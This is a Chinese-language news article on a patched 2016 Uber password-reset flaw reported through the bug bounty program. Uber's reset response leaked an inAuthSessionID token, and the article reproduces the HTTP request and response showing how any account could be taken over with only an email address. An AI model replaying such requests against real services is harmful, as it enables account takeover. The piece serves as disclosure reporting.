Uber曝出“密码重置”漏洞

近日，一名意大利安全专家在Uber系统中发现了一个关键的身份验证不当漏洞，利用该漏洞，攻击者可以对任何账户重新设置密码。

意大利安全专家Vincenzo C（网名为@Procode701）在7个月前就发现了Uber平台存在这一关键漏洞，该漏洞允许攻击者对任何Uber帐户重置密码。据悉，该研究人员通过Uber在Hackerone平台发布的“漏洞悬赏计划”报告了该“不正确的身份验证”漏洞。

Uber发布的漏洞摘要指出，

只需要通过一个Uber有效帐户的电子邮件地址，任何人都可以接管该账户，因为重置令牌在密码重置HTTP请求的响应中就会暴露。这就意味着，攻击者可以为用户账户启动密码重置请求，并接收该账户的重置令牌。

Uber进一步表示，

我们认为用户数据的安全性是至关重要的，所以我们对Procode701提交的安全报告非常重视。此外，很荣幸Procode701可以与我们合作，期待未来可以为我们提供更多的安全报告和建议。

这名意大利专家在密码重置过程中发现了一个非常严重的问题，可能会被用来生成可以用于更改任何账户密码的“inAuthSessionID”身份验证令牌。

Procode701还进一步透露了更多详细信息，他说，只需要使用任何有效Uber帐户的电子邮件地址来发送密码重置请求，回复信息中就会包含“inAuthSessionID”会话令牌。每次用户发送密码重置电子邮件时，Uber平台都会生成特定的会话令牌。

一旦获得“inAuthSessionID”会话令牌，攻击者就可以使用更改密码表单中存在的标准链接更改密码。

1.  https://auth.uber.com/login/stage/PASTE，会话ID <—通过发送重置密码邮件生成的inAuthSessionID/af9b9d0c-bb98-41de-876c-4cb911c79bd1 <–没有截止日期的tokenID。

POST /login/handleanswer HTTP/1.1 Host: auth.uber.com 
{ "init": false, 
   "answer": { 
      "type": "PASSWORD_RESET_WITH_EMAIL", 
      "userIdentifier": { 
          "email": "[email protected]" 
      } 
   } 
}
Reply
HTTP/1.1 200 OK 

{ 
     "inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28", 
     "stage": { 
         "question": { 
                       "signinToken": "", 
                       "type": "VERIFY_PASSWORD_RESET", 
                        "tripChallenges": [] 
                     }, 
                     "alternatives": [] 
      } 
}

该漏洞的影响是非常严重的，它允许攻击者访问任何账户和任何用户的数据，包括身份证号码、银行数据、驱动程序许可甚至财务数据等。

漏洞时间线：

2016年10月2日——将漏洞报告给Uber公司；

2016年10月4日——漏洞审核；

2016年10月6日——漏洞修复；

2016年10月18日——授予研究人员10000美元现金奖励。